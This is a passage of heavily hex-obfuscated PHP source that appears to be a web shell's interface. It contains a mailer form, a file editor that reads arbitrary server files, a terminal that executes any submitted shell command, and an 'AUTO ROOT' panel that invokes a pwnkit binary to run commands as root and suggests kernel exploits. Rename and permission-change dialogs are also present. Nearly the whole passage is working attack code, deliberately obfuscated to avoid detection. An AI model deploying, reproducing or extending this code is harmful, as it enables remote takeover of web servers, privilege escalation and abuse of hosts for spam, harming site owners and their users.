ty\x70e=\x22number\"\x20\x6e\x61\x6d\x65=\"\x62\x61\x63kc\x6fnne\x63t-\x70o\x72\x74\" \x63\x6ca\x73\x73=\"\x6d\x6f\x64\x61l-c\x72ea\x74\x65-in\x70ut\"\x20\x70\x6c\x61\x63\x65h\x6f\x6cde\x72\x3d\"\x3133\x37\x22\x3e\n \x20\x20 \x20\x20 \x20 \x20\x20 \x20\x20 \x20\x20 \x20 \x20   \x3c\x64i\x76\x20c\x6cass\x3d\x22mo\x64al-\x62\x74n-f\x6frm\"\x3e\n\x20\x20 \x20  \x20\x20\x20  \x20 \x20\x20  \x20    \x20 \x20\x20\x20 &lt;\x69nput\x20\x74\x79\x70\x65\x3d\x22\x73ub\x6dit\"\x20\x6eam\x65\x3d\x22s\x75bmit-bc\"\x20v\x61\x6cue=\x22S\x75\x62\x6di\x74\x22\x20\x63la\x73\x73\x3d\"\x62t\x6e-\x6d\x6f\x64\x61l-\x63\x6cos\x65 \x62\x6f\x78-\x73h\x61\x64\x6f\x77\"\x3e\x26\x6e\x62\x73p;\x3ca \x63l\x61\x73\x73\x3d\x22\x62\x74\x6e-\x6dod\x61\x6c-c\x6c\x6f\x73\x65\x20b\x6fx-\x73h\x61do\x77\"\x20h\x72ef=\"?\x64=";$ycghfewypdj="\x66\x75\x6e\x67\x73\x69";echo hx(${$ycghfewypdj}[0]());echo "\x22\x3eC\x6co\x73\x65\x3c/\x61&gt;\n \x20 \x20 \x20  \x20\x20 \x20\x20\x20  \x20\x20\x20 \x20   \x3c/d\x69v&gt;\n \x20 \x20\x20\x20\x20\x20 \x20\x20\x20\x20\x20\x20\x20\x3c/\x66o\x72\x6d\x3e\n \x20  \x20\x20     \x20&lt;/\x64\x69v\x3e\n\x20\x20    \x20 &lt;/di\x76&gt;\n   \x20";}echo "\n\x20\x20\x20 ";if(isset($_GET["\x6d\x61iler"])){echo " \x20\x20 \x20  \x20&lt;\x64\x69\x76\x20cl\x61\x73\x73=\"mod\x61\x6c\x20a\x63\x74i\x76\x65\x22\x3e\n\x20 \x20\x20\x20 \x20\x20\x20\x20  \x3c\x64\x69\x76\x20\x63\x6cass\x3d\"\x6d\x6fdal-con\x74\x61i\x6e\x65r\"&gt;\n \x20\x20  \x20\x20\x20   \x20\x20   &lt;div c\x6c\x61\x73s=\"\x6do\x64\x61\x6c-\x68\x65ad\x65\x72\"&gt;\n\x20\x20\x20\x20  \x20 \x20\x20\x20\x20 \x20 \x20\x20 \x20\x20&lt;\x683\x3e&lt;\x62&gt;\x3ci\x20i\x64\x3d\x22m\x6f\x64\x61\x6c-ti\x74le\"\x3e::\x20\x50HP \x4d\x61\x69\x6cer\x3c/i\x3e&lt;/\x62\x3e&lt;/h\x33&gt;\n  \x20 \x20\x20 \x20\x20\x20 \x20   \x20&lt;/\x64i\x76&gt;\n \x20  \x20 \x20 \x20      \x20\x3cf\x6fr\x6d act\x69\x6fn=\x22\" met\x68\x6fd=\x22po\x73t\x22&gt;\n \x20\x20 \x20   \x20\x20\x20\x20\x20\x20   \x20\x20\x20&lt;\x64\x69v c\x6cas\x73\x3d\"m\x6f\x64a\x6c-\x62\x6f\x64\x79\"\x3e\n\x20 \x20\x20\x20\x20\x20\x20\x20 \x20 \x20\x20\x20 \x20\x20\x20 \x20   &lt;div \x63\x6ca\x73s=\x22\x6dod\x61\x6c-is\x69\x22&gt;\n \x20 \x20\x20 \x20\x20   \x20  \x20\x20\x20  \x20\x20 \x20 \x20 \x20 &lt;\x66\x6f\x72\x6d\x20act\x69\x6f\x6e=\"\x22 me\x74ho\x64\x3d\"pos\x74\x22\x3e\n\x20\x20\x20  \x20\x20     \x20 \x20\x20  \x20\x20\x20\x20 \x20\x20\x20  \x20\x20\x20\x20\x3cdiv cl\x61ss=\x22m\x6fd\x61l-\x6da\x69\x6c-te\x78t\x22\x3e\n\x20   \x20\x20\x20 \x20\x20\x20  \x20 \x20\x20 \x20 \x20\x20    \x20 \x20  \x20\x20\x20\x20\x20&lt;t\x65xta\x72e\x61 \x6ea\x6de\x3d\x22\x6d\x65s\x73age-s\x6dt\x70\" c\x6ca\x73\x73\x3d\x22box-sh\x61\x64\x6fw\x20m\x61\x69\x6c\"\x20pla\x63e\x68o\x6c\x64e\x72=\"&amp;nbs\x70\x3b\x59o\x75r\x20Tex\x74\x20\x68e\x72e!\"&gt;\x3c/\x74\x65xta\x72ea&gt;\n\x20 \x20\x20       \x20\x20  \x20\x20   \x20  \x20 \x20 \x20  \x20 \x3c/\x64i\x76&gt;\n   \x20   \x20       \x20\x20\x20 \x20 \x20 \x20    \x20\x20 \x20\x3c\x62r&gt;\n\x20 \x20\x20  \x20 \x20   \x20 \x20   \x20\x20\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20    \x20   \x20&lt;\x69\x6e\x70\x75t\x20t\x79\x70e=\"\x74\x65\x78\x74\x22 \x6eam\x65=\"m\x61i\x6c\x74o-\x73ub\x6aec\x74\"\x20cl\x61ss=\"\x6d\x6f\x64\x61l-\x63\x72ea\x74e-i\x6e\x70u\x74\"\x20\x70l\x61c\x65\x68o\x6c\x64\x65\x72\x3d\x22S\x75\x62j\x65ct\x22\x3e\n   \x20     \x20 \x20\x20   \x20\x20\x20 \x20\x20\x20\x20 \x20 \x20\x20\x20\x20 \x3cbr&gt;\x3cb\x72&gt;\n\x20\x20\x20\x20   \x20 \x20\x20 \x20\x20\x20\x20  \x20    \x20\x20\x20\x20\x20  \x20\x20\x3cin\x70\x75t \x74ype=\"e\x6d\x61\x69\x6c\"\x20n\x61m\x65=\x22\x6d\x61\x69l-\x66\x72\x6fm-s\x6d\x74\x70\x22 c\x6ca\x73\x73=\x22\x6d\x6f\x64a\x6c-cr\x65\x61\x74\x65-\x69\x6ep\x75t\" \x70\x6cac\x65h\x6fl\x64e\x72=\x22\x66ro\x6d\x20: \x65\x78am\x70\x6ce\x40\x6d\x61\x69l.co\x6d\"\x3e\n\x20    \x20    \x20  \x20 \x20  \x20   \x20 \x20\x20     \x20&lt;\x62\x72&gt;\x3cbr\x3e\n\x20\x20  \x20\x20 \x20\x20   \x20\x20\x20  \x20 \x20 \x20\x20 \x20  \x20  \x20\x20\x3ci\x6e\x70\x75t type=\"\x65\x6da\x69l\x22 \x6e\x61\x6de=\x22\x6dai\x6c-t\x6f-\x73\x6d\x74\x70\x22\x20\x63\x6ca\x73\x73=\x22m\x6fd\x61\x6c-c\x72\x65at\x65-in\x70ut\"\x20\x70la\x63e\x68ol\x64e\x72=\"t\x6f\x20: ex\x61\x6d\x70\x6c\x65\x40\x6d\x61il\x2ec\x6fm\"&gt;\n\x20\x20 \x20\x20 \x20\x20  \x20 \x20 \x20\x20 \x20    \x20 \x3c/\x64iv&gt;\n\x20\x20 \x20    \x20\x20\x20    \x20\x20\x20   \x20 \x20\x3c\x64i\x76 \x63l\x61s\x73\x3d\x22moda\x6c-btn-f\x6f\x72m\"\x3e\n\x20\x20\x20\x20\x20\x20\x20 \x20 \x20 \x20   \x20\x20  \x20   \x20\x20 \x20&lt;i\x6ep\x75\x74 \x74yp\x65\x3d\"s\x75bm\x69\x74\x22\x20n\x61\x6de=\"su\x62mit\x22 va\x6cu\x65=\"\x53\x75bm\x69t\" c\x6c\x61ss=\"btn-\x6do\x64\x61\x6c-\x63los\x65\x20\x62\x6fx-s\x68ad\x6fw\"&gt;\x26\x6e\x62\x73\x70\x3b&lt;\x61 \x63\x6cass\x3d\"\x62tn-mo\x64al-\x63lo\x73\x65 \x62ox-\x73\x68\x61\x64o\x77\" \x68\x72ef=\x22?\x64=";$mucvjeb="fu\x6eg\x73\x69";echo hx(${$mucvjeb}[0]());echo "\x22&gt;Cl\x6fs\x65\x3c/a&gt;\n  \x20 \x20   \x20\x20\x20\x20\x20\x20   \x20\x20   \x20\x20&lt;/di\x76&gt;\n    \x20 \x20\x20\x20    \x20\x20\x20&lt;/\x66or\x6d\x3e\n \x20  \x20\x20 \x20\x20\x20\x20 \x3c/\x64i\x76\x3e\n      \x20\x20\x3c/d\x69\x76\x3e\n \x20\x20\x20";}echo "\n   \x20";if($_GET["f"]){echo "\x20  \x20 \x20\x20 \x3cdiv \x63\x6cas\x73\x3d\"\x63\x6fd\x65-\x65\x64\x69t\x6f\x72\x22&gt;\n\x20    \x20\x20 \x20\x20 \x20&lt;div \x63\x6cass=\x22\x63\x6fd\x65-e\x64\x69\x74o\x72-\x63ont\x61\x69\x6e\x65\x72\"&gt;\n\x20\x20 \x20 \x20\x20     \x20\x20 \x20\x3cdiv\x20cla\x73s\x3d\x22c\x6f\x64e-ed\x69\x74or-he\x61\x64\"\x3e\n\x20\x20\x20\x20   \x20\x20 \x20\x20\x20\x20\x20 \x20\x20 \x20\x3ch3&gt;&lt;i\x20\x63l\x61s\x73=\"\x66\x61-so\x6c\x69d\x20fa-c\x6f\x64e\"&gt;&lt;/\x69&gt;&amp;\x6e\x62\x73\x70\x3b\x20C\x6f\x64e\x20E\x64ito\x72\x20:\x20";echo unx($_GET["\x66"]);$gwiwzf="fungs\x69";echo "&lt;/\x68\x33\x3e\n \x20 \x20\x20\x20 \x20 \x20\x20\x20\x20\x20 \x20\x3c/\x64i\x76&gt;\n  \x20 \x20\x20\x20\x20 \x20   \x20 \x20&lt;d\x69v\x20c\x6ca\x73\x73=\"co\x64e-\x65\x64\x69\x74\x6f\x72-bo\x64\x79\x22\x3e\n\x20 \x20\x20 \x20\x20\x20   \x20   \x20\x20  \x20&lt;for\x6d \x61c\x74\x69o\x6e=\x22\"\x20me\x74\x68o\x64=\"pos\x74\x22&gt;\n   \x20\x20\x20   \x20\x20 \x20\x20\x20  \x20\x20\x20  \x20 &lt;te\x78t\x61\x72\x65a\x20n\x61\x6d\x65\x3d\x22\x63\x6f\x64e-e\x64\x69\x74or\x22 \x63\x6c\x61ss=\x22\x62o\x78-\x73\x68\x61dow\"\x20au\x74\x6ffo\x63us&gt;";${"G\x4c\x4f\x42\x41L\x53"}["\x70\x71\x71\x78\x68\x6d\x65\x6ahw"]="f\x75n\x67s\x69";$giynpwjj="\x66\x75\x6e\x67\x73i";echo ${$giynpwjj}[10](${$gwiwzf}[11](${${"G\x4cO\x42\x41LS"}["p\x71q\x78\x68m\x65\x6a\x68\x77"]}[0]()."/".unx($_GET["f"])));echo "&lt;/\x74ex\x74\x61\x72\x65a&gt;\n\x20\x20 \x20\x20\x20   \x20 \x20 \x20\x20\x20 \x20  \x20   &lt;d\x69v\x20\x63la\x73s\x3d\x22\x6dod\x61l-b\x74\x6e-\x66o\x72m\"&gt;\n\x20\x20\x20\x20\x20  \x20\x20 \x20\x20\x20 \x20\x20 \x20\x20\x20   \x20\x20 \x20\x20&lt;\x69\x6e\x70\x75\x74 \x74y\x70e=\x22s\x75bmi\x74\x22 na\x6de\x3d\x22\x73\x61\x76\x65-e\x64i\x74\x6fr\"\x20\x76alu\x65\x3d\"\x53\x61\x76e\x22\x20cl\x61\x73\x73\x3d\"b\x74\x6e-\x6dodal-c\x6c\x6f\x73\x65\x22\x3e\x26\x6eb\x73p\x3b\x3c\x62u\x74\x74on\x20cl\x61s\x73=\x22\x62\x74\x6e-\x6d\x6fd\x61\x6c-c\x6c\x6f\x73e\x22\x20\x69d=\x22\x63\x6c\x6f\x73e-\x65dit\x6f\x72\x22\x3eCl\x6f\x73\x65&lt;/b\x75\x74\x74\x6fn&gt;\n \x20\x20   \x20 \x20 \x20 \x20 \x20\x20 \x20\x20 \x20\x20\x20\x20\x3c/\x64\x69\x76&gt;\n\x20 \x20\x20  \x20    \x20 \x20\x20\x20   \x20\x3c/f\x6f\x72\x6d\x3e\n  \x20\x20  \x20\x20\x20   \x20 \x20 &lt;/d\x69v\x3e\n\x20\x20 \x20   \x20\x20  \x20&lt;/\x64\x69v&gt;\n\x20  \x20\x20\x20\x20\x20\x3c/di\x76&gt;\n    ";}echo "\n \x20\x20 ";if($_GET["\x74\x65rmi\x6e\x61\x6c"]=="n\x6f\x72m\x61\x6c"){echo "     \x20\x20 &lt;\x64i\x76 \x63lass\x3d\x22\x74\x65r\x6di\x6eal\"&gt;\n\x20\x20  \x20\x20 \x20 \x20  \x3c\x64\x69v\x20class=\x22\x74\x65\x72min\x61\x6c-c\x6f\x6e\x74ai\x6e\x65r\x22&gt;\n\x20  \x20\x20\x20 \x20   \x20\x20  \x20\x3cdiv\x20c\x6ca\x73s=\"t\x65\x72\x6d\x69na\x6c-h\x65ad\x22\x3e\n\x20\x20  \x20\x20\x20 \x20\x20\x20 \x20\x20\x20 \x20\x20 \x20&lt;\x75\x6c&gt;\n \x20 \x20 \x20\x20     \x20\x20\x20\x20   \x20\x20\x20 \x20\x3cli\x20id\x3d\"te\x72m\x69\x6eal-t\x69t\x6ce\"&gt;\x3cb\x3e\x3c\x69 \x63\x6c\x61ss\x3d\x22\x66\x61-\x73\x6f\x6cid \x66a-term\x69\x6ea\x6c\"&gt;\x3c/\x69&gt;\x26\x6ebs\x70\x3bT\x45R\x4d\x49\x4e\x41\x4c&lt;/\x62\x3e&lt;/\x6c\x69&gt;\n  \x20\x20   \x20\x20   \x20\x20  \x20 \x20\x20\x20 \x20\x20&lt;\x6ci\x3e&lt;\x61\x20\x68r\x65f\x3d\"\"\x20c\x6ca\x73\x73=\x22\x63l\x6fse-\x74\x65\x72\x6di\x6e\x61l\"&gt;&lt;\x69\x20c\x6c\x61s\x73=\x22\x66a-\x73\x6flid \x66\x61-ri\x67\x68t-f\x72o\x6d-\x62ra\x63k\x65\x74\x22&gt;\x3c/i\x3e\x3c/a\x3e&lt;/li&gt;\n    \x20\x20 \x20\x20\x20    \x20\x20\x20\x20\x20\x20\x3c/ul\x3e\n\x20  \x20  \x20  \x20 \x20\x20 \x20 &lt;/div&gt;\n \x20 \x20 \x20 \x20\x20\x20\x20 \x20\x20 \x20&lt;div\x20cl\x61\x73\x73\x3d\"t\x65r\x6di\x6eal-b\x6fd\x79\"\x3e\n\x20\x20\x20   \x20 \x20\x20\x20\x20 \x20   \x20 \x20\x3c\x74e\x78\x74a\x72\x65a c\x6ca\x73\x73\x3d\"\x62o\x78-\x73\x68adow\"\x20disable\x64\x3e";if(isset($_POST["t\x65\x72mina\x6c"])){$cgqchpefme="\x66\x75\x6e\x67\x73\x69";echo${$cgqchpefme}[10](cmd($_POST["\x74\x65r\x6dinal-t\x65\x78t"]."\x20\x32\x3e\x26\x31"));}echo "\x3c/te\x78\x74\x61rea\x3e\n \x20\x20\x20 \x20   \x20\x20  \x20\x20\x20  \x20 \x3c\x66\x6f\x72\x6d \x61ct\x69o\x6e\x3d\x22\"\x20\x6d\x65\x74ho\x64=\x22pos\x74\x22&gt;\n  \x20\x20\x20\x20 \x20  \x20  \x20\x20   \x20 \x20   \x3cul&gt;\n \x20\x20\x20\x20\x20 \x20 \x20 \x20  \x20\x20 \x20 \x20\x20\x20 \x20\x20\x20  &lt;\x6ci\x3e\x3cinpu\x74\x20\x74\x79pe\x3d\"\x74e\x78t\x22\x20nam\x65=\"t\x65\x72mina\x6c-\x74e\x78t\x22 c\x6cass=\"termin\x61l-\x69\x6epu\x74\x20\x62\x6f\x78-\x73\x68\x61d\x6f\x77\x22\x20p\x6cac\x65ho\x6c\x64e\x72\x3d\x22";echo ${${"\x47\x4c\x4fB\x41\x4cS"}["\x68\x67u\x61\x6eqd\x64"]}[9]()."\x40".$_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x41\x44\x44\x52"];echo "\x22 \x61\x75\x74o\x66\x6fcu\x73\x3e\x3c/li\x3e\n\x20 \x20\x20  \x20   \x20\x20 \x20\x20\x20\x20 \x20\x20\x20 \x20\x20  \x20 &lt;li\x3e\x3c\x69\x6e\x70\x75t ty\x70\x65=\"\x73\x75bm\x69t\" n\x61\x6de=\x22t\x65\x72m\x69\x6eal\" \x76\x61lu\x65=\x22&gt;\"\x20\x63la\x73s\x3d\"\x62\x74n-m\x6f\x64\x61\x6c-close\"\x3e&lt;/li&gt;\n\x20  \x20\x20 \x20  \x20\x20\x20\x20\x20\x20\x20 \x20\x20\x20\x20\x20\x20\x20&lt;/ul&gt;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20  \x20\x20 \x20  \x20  &lt;/\x66o\x72\x6d\x3e\n  \x20 \x20\x20  \x20\x20    \x20\x20&lt;/\x64i\x76\x3e\n\x20\x20 \x20 \x20 \x20 \x20\x20\x20&lt;/\x64iv\x3e\n\x20       \x3c/\x64i\x76&gt;\n\x20\x20  ";}echo "\n\x20\x20\x20 ";if($_GET["\x74\x65\x72m\x69\x6eal"]=="ro\x6ft"){$mxgeqfylt="f\x75\x6e\x67\x73\x69";echo "       \x20&lt;di\x76\x20\x63l\x61\x73s=\"t\x65r\x6din\x61\x6c\x22&gt;\n  \x20 \x20 \x20\x20\x20 \x20\x20\x3cd\x69\x76 \x63l\x61ss=\"t\x65\x72\x6d\x69n\x61\x6c-c\x6f\x6e\x74a\x69n\x65\x72\"&gt;\n\x20 \x20 \x20\x20\x20 \x20  \x20 \x20\x20\x20\x3c\x64\x69v\x20c\x6c\x61ss=\"\x74\x65\x72\x6d\x69na\x6c-he\x61d\x22\x3e\n\x20 \x20\x20\x20 \x20\x20  \x20\x20   \x20\x20   &lt;u\x6c&gt;\n\x20\x20 \x20\x20\x20\x20\x20 \x20\x20  \x20\x20\x20   \x20\x20  \x20&lt;li\x20i\x64=\x22te\x72\x6d\x69\x6e\x61\x6c-\x74i\x74le\"&gt;&lt;b\x3e\x3c\x69\x20cl\x61ss=\x22\x66a-\x73o\x6c\x69d\x20f\x61-\x74erm\x69na\x6c\"\x3e\x3c/\x69\x3e\x26nb\x73p;\x41\x55\x54\x4f R\x4f\x4f\x54&lt;/b\x3e&lt;/l\x69&gt;\n\x20 \x20\x20\x20    \x20 \x20\x20\x20 \x20\x20   \x20   \x3cli&gt;\x3ca\x20hr\x65\x66\x3d\x22\x22 c\x6ca\x73s\x3d\"\x63l\x6f\x73e-\x74e\x72\x6di\x6eal\x22&gt;\x3ci \x63l\x61\x73s=\"fa-\x73\x6f\x6c\x69\x64\x20\x66a-\x72ight-fr\x6fm-b\x72\x61c\x6b\x65t\"\x3e\x3c/\x69\x3e\x3c/a\x3e\x3c/li\x3e\n \x20\x20 \x20 \x20\x20\x20 \x20\x20 \x20\x20\x20    &lt;/\x75l&gt;\n\x20 \x20\x20\x20  \x20 \x20\x20\x20\x20 \x20 &lt;/\x64iv&gt;\n   \x20\x20     \x20\x20\x20  \x20&lt;\x64iv cl\x61ss\x3d\x22\x74er\x6d\x69na\x6c-body\x22\x3e\n      \x20  \x20 \x20\x20\x20\x20\x20\x20\x20 \x20\x3ct\x65\x78t\x61re\x61 \x6e\x61m\x65\x3d\"\x22\x20d\x69\x73\x61\x62\x6ced\x3e";if(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x68\x67\x75a\x6e\x71\x64\x64"]}[3](".m\x61d-\x72\x6f\x6ft")&amp;&amp;${$mxgeqfylt}[3]("\x70\x77\x6ekit")){$rcpeagjru="\x72es\x70\x6f\x6e\x73\x65";$kfcidrkpfe="\x72\x5ft\x65\x78\x74";${${"\x47L\x4f\x42\x41\x4cS"}["\x6b\x64\x77\x76\x66\x6e\x63zd\x6bq"]}=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x67uan\x71\x64\x64"]}[11]("\x2ema\x64-ro\x6f\x74");${${"G\x4c\x4fB\x41L\x53"}["\x61\x74ex\x65\x6a\x76\x62"]}=explode(" ",${$rcpeagjru});if(${$kfcidrkpfe}[0]=="\x75i\x64=0(\x72\x6f\x6f\x74)"){if(isset($_POST["\x73\x75\x62\x6d\x69t-\x72oo\x74"])){echo cmd("./p\x77\x6eki\x74\x20\x22".$_POST["\x72\x6fot-t\x65r\x6d\x69nal"]."  2\x3e\x261\"");}}else{echo"Th\x69\x73 \x44\x65v\x69\x63\x65\x20Is\x20\x4eot\x20\x56u\x6c\x6ee\x72ab\x6ce\n";echo cmd("\x6cs\x62_\x72\x65le\x61se -\x61")."\n";echo"K\x65\x72\x6e\x65l V\x65r\x73\x69\x6fn :\x20".suggest_exploit()."\n";}}else{$wxnvqsep="fu\x6e\x67s\x69";${$wxnvqsep}[24](".ma\x64-ro\x6f\x74");}echo "\x3c/t\x65xt\x61\x72e\x61\x3e\n  \x20\x20  \x20\x20   \x20 \x20\x20\x20 \x20\x20 &lt;form \x61ct\x69on\x3d\"\" me\x74\x68\x6fd\x3d\"\x70os\x74\x22&gt;\n\x20\x20\x20\x20\x20  \x20\x20 \x20 \x20\x20   \x20   \x20\x20 &lt;ul\x3e\n\x20\x20\x20\x20   \x20 \x20 \x20\x20\x20    \x20\x20\x20 \x20 \x20\x20\x20\x20\x3cli\x3e\x3cin\x70u\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\x3d\x22\x74ex\x74\" \x6e\x61\x6de=\"ro\x6ft-t\x65\x72min\x61l\" cla\x73\x73=\"\x74\x65rm\x69na\x6c-i\x6epu\x74\" pla\x63\x65h\x6fl\x64e\x72=\"";echo "roo\x74"."\x40".$_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x41\x44\x44\x52"];echo "\x22 aut\x6f\x66\x6f\x63\x75\x73&gt;\x3c/l\x69\x3e\n\x20 \x20\x20 \x20 \x20\x20 \x20    \x20 \x20 \x20 \x20 \x20\x20   \x3c\x6c\x69\x3e&lt;\x69\x6ep\x75t \x74\x79pe\x3d\x22s\x75b\x6d\x69t\" n\x61m\x65\x3d\x22\x73\x75bm\x69t-\x72\x6fot\" v\x61lue=\"&gt;\x22\x20cl\x61s\x73\x3d\"b\x74n-mo\x64a\x6c-\x63l\x6f\x73e\"&gt;\x3c/li\x3e\n\x20\x20\x20   \x20 \x20\x20\x20\x20  \x20\x20\x20\x20 \x20 \x20 \x20&lt;/\x75l&gt;\n\x20\x20\x20\x20 \x20 \x20     \x20   \x20\x20\x20\x3c/fo\x72\x6d&gt;\n\x20  \x20\x20\x20\x20 \x20\x20 \x20\x20\x20\x20\x20\x3c/di\x76&gt;\n\x20\x20  \x20\x20 \x20  \x20\x20\x3c/di\x76&gt;\n\x20  \x20    \x3c/di\x76\x3e\n\x20 \x20\x20";}echo "\n\x20   ";if($_GET["re"]==true){echo " \x20  \x20\x20\x20\x20&lt;\x64iv cla\x73\x73=\"\x6do\x64a\x6c ac\x74ive\x22\x3e\n \x20  \x20    \x20\x20 \x3cd\x69v\x20\x63\x6ca\x73\x73=\x22m\x6f\x64\x61l-c\x6f\x6e\x74\x61\x69\x6eer\x22&gt;\n  \x20   \x20\x20\x20  \x20\x20  \x20\x3c\x64i\x76\x20\x63\x6ca\x73\x73=\"mo\x64al-h\x65a\x64er\"\x3e\n \x20  \x20\x20   \x20 \x20   \x20\x20  \x20\x3ch\x33&gt;&lt;b\x3e\x3ci i\x64=\x22\x6d\x6f\x64al-t\x69\x74\x6ce\x22&gt;\x52ena\x6d\x65 :\x20";echo unx($_GET["re"]);echo "\x3c/\x69&gt;&lt;/\x62\x3e&lt;/h3\x3e\n \x20   \x20\x20     \x20\x20\x20 &lt;/\x64iv&gt;\n \x20\x20\x20\x20\x20\x20 \x20\x20\x20\x20 \x20  &lt;\x64\x69v\x20c\x6ca\x73\x73\x3d\x22m\x6f\x64a\x6c-\x62o\x64\x79\"&gt;\n \x20\x20\x20\x20   \x20   \x20\x20\x20\x20\x20\x20 \x20&lt;\x66\x6fr\x6d \x61c\x74\x69\x6fn=\x22\"\x20\x6d\x65\x74h\x6f\x64=\x22po\x73t\x22&gt;\n \x20   \x20\x20 \x20       \x20  \x20\x20\x20\x20\x20&lt;\x73p\x61\x6e i\x64\x3d\x22\x6d\x6fd\x61l-in\x70u\x74\"&gt;&lt;\x69\x6eput\x20\x74yp\x65\x3d\x22\x74ex\x74\"\x20nam\x65\x3d\x22\x72\x65\x6e\x61\x6d\x65Fi\x6ce\" c\x6c\x61\x73s\x3d\"\x6d\x6f\x64\x61\x6c-c\x72\x65\x61\x74e-i\x6e\x70ut\"\x20placehol\x64\x65r=\x22\x52\x65\x6e\x61me\"\x3e\x3c/\x73p\x61n&gt;\n \x20\x20\x20 \x20 \x20 \x20\x20     \x20\x20\x20\x20   \x20&lt;div \x63lass\x3d\"\x6do\x64al-\x62\x74n-\x66orm\"\x3e\n \x20\x20   \x20  \x20    \x20\x20\x20   \x20\x20\x20\x20 \x20 \x20&lt;i\x6epu\x74 ty\x70e=\x22s\x75bmi\x74\x22 n\x61\x6d\x65=\x22su\x62mi\x74\"\x20va\x6cue\x3d\"\x53\x75bmi\x74\" \x63\x6c\x61s\x73\x3d\x22bt\x6e-\x6doda\x6c-close \x62ox-s\x68ad\x6f\x77\x22&gt;&amp;n\x62\x73p;&lt;\x62utton\x20c\x6c\x61\x73\x73\x3d\x22b\x74\x6e-m\x6f\x64\x61\x6c-\x63l\x6fse \x62\x6fx-\x73h\x61\x64ow \x63lose-b\x74\x6e-\x73\x22&gt;Cl\x6fse\x3c/\x62\x75\x74\x74on\x3e\n\x20 \x20  \x20 \x20   \x20  \x20\x20 \x20 \x20   \x20\x3c/\x64iv\x3e\n\x20   \x20      \x20  \x20    \x20\x3c/f\x6f\x72\x6d\x3e\n\x20 \x20  \x20    \x20  \x20  \x3c/div\x3e\n\x20  \x20\x20 \x20 \x20 \x20\x20&lt;/d\x69v\x3e\n  \x20\x20 \x20\x20 &lt;/d\x69\x76\x3e\n\x20\x20     \x20\x3c/di\x76\x3e\n  \x20 ";}echo "\n  \x20\x20";if($_GET["\x63\x68"]==true){echo "  \x20     \x3cd\x69v\x20c\x6cas\x73=\x22modal\x20\x61cti\x76\x65\"\x3e\n\x20  \x20   \x20  \x20 &lt;\x64\x69\x76\x20\x63l\x61\x73s=\"\x6dod\x61\x6c-\x63o\x6e\x74\x61\x69ne\x72\"&gt;\n \x20 \x20 \x20 \x20 \x20 \x20    &lt;div\x20\x63\x6c\x61ss\x3d\"\x6dod\x61l-hea\x64\x65\x72\"&gt;\n    \x20\x20 \x20\x20\x20 \x20 \x20 \x20\x20\x20  \x3c\x683&gt;\x3c\x62\x3e\x3ci\x20i\x64\x3d\x22mod\x61\x6c-\x74\x69tl\x65\x22&gt;C\x68ange\x20\x50e\x72mi\x73\x73ion\x20:\x20";echo unx($_GET["c\x68"]);echo "\x3c/i\x3e\x3c/\x62&gt;\x3c/h\x33&gt;\n\x20 \x20\x20  \x20 \x20 \x20  \x20\x20\x20&lt;/d\x69\x76&gt;\n   \x20 \x20 \x20\x20\x20 \x20\x20\x20  &lt;di\x76 cla\x73s\x3d\x22m\x6f\x64a\x6c-\x62ody\"\x3e\n \x20\x20     \x20\x20\x20\x20\x20    \x20\x20\x20\x3cf\x6f\x72\x6d acti\x6f\x6e=\"\x22\x20\x6dethod\x3d\"p\x6fst\"&gt;\n\x20 \x20   \x20\x20\x20 \x20 \x20\x20 \x20 \x20\x20\x20  \x20 \x3csp\x61n\x20\x69\x64=\x22\x6d\x6fda\x6c-\x69\x6e\x70ut\"&gt;&lt;inp\x75\x74 \x74y\x70\x65=\x22\x6e\x75m\x62e\x72\x22\x20name\x3d\"\x63\x68\x46\x69le\"\x20\x63\x6c\x61ss=\"\x6d\x6f\x64\x61\x6c-\x63\x72\x65a\x74e-i\x6e\x70u\x74\"\x20\x70l\x61c\x65h\x6f\x6c\x64er=\x22\x30\x37\x37\x35\"\x3e\x3c/spa\x6e\x3e\n \x20\x20 \x20\x20\x20\x20  \x20\x20  \x20\x20\x20\x20\x20\x20\x20\x20  &lt;\x64\x69v\x20c\x6ca\x73\x73\x3d\"\x6doda\x6c-btn-\x66\x6frm\"&gt;\n\x20\x20    \x20 \x20 \x20 \x20   \x20\x20\x20\x20\x20\x20   \x20 \x20\x3ci\x6e\x70u\x74 \x74ype\x3d\"s\x75bm\x69\x74\x22 \x6eame\x3d\x22\x73ub\x6dit\x22\x20va\x6cue\x3d\x22\x53\x75bmit\" \x63la\x73\x73=\"b\x74\x6e-mo\x64\x61\x6c-\x63\x6co\x73e\x20\x62ox-\x73h\x61dow\"&gt;&amp;nb\x73\x70\x3b&lt;butt\x6f\x6e\x20\x63la\x73s\x3d\x22\x62\x74\x6e-m\x6fda\x6c-\x63los\x65 \x62ox-s\x68\x61d\x6f\x77\x20\x63l\x6f\x73e-b\x74\x6e-\x73\"\x3e\x43\x6cose&lt;/\x62\x75\x74t\x6f\x6e&gt;\n \x20 \x20 \x20\x20   \x20\x20  \x20      \x20\x20 &lt;/d\x69\x76\x3e\n\x20  \x20\x20  \x20\x20\x20\x20   \x20\x20 \x20 \x20&lt;/f\x6f\x72\x6d&gt;\n \x20     \x20 \x20  \x20 \x20 \x3c/d\x69v\x3e\n\x20\x20\x20\x20\x20 \x20\x20 \x20  &lt;/div\x3e\n\x20\x20 \x20\x20\x20  \x3c/\x64iv&gt;\n\x20\x20\x20\x20 \x20 \x20&lt;/d\x69v\x3e\n\x20\x20 \x20";}echo "\n\x20  \x20\x3c\x73c\x72i\x70t\x3e\n\x20\x20  \x20 \x20\x20\$(\x64\x6f\x63\x75\x6d\x65nt).r\x65ad\x79(f\x75ncti\x6f\x6e()\x20{\n \x20\x20  \x20   \x20\x20 \$(\x27#cr\x65\x61\x74e\x5ffo\x6cde\x72\x27)\x2ec\x6c\x69\x63k(\x66u\x6e\x63\x74\x69\x6f\x6e() {\n \x20  \x20  \x20 \x20\x20\x20  \x20 \$('\x2e\x6doda\x6c').\x73\x68o\x77()\x3b\n \x20\x20 \x20\x20          \$(\x27\x23mo\x64\x61\x6c-ti\x74le')\x2eht\x6dl('&lt;i\x20c\x6c\x61\x73s\x3d\x22fa-s\x6f\x6ci\x64\x20\x66a-f\x6f\x6c\x64\x65r-\x70\x6c\x75\x73\x22&gt;\x3c/i&gt;\x26\x6e\x62\x73\x70\x3b\x43r\x65ate Fol\x64\x65\x72');\n\x20 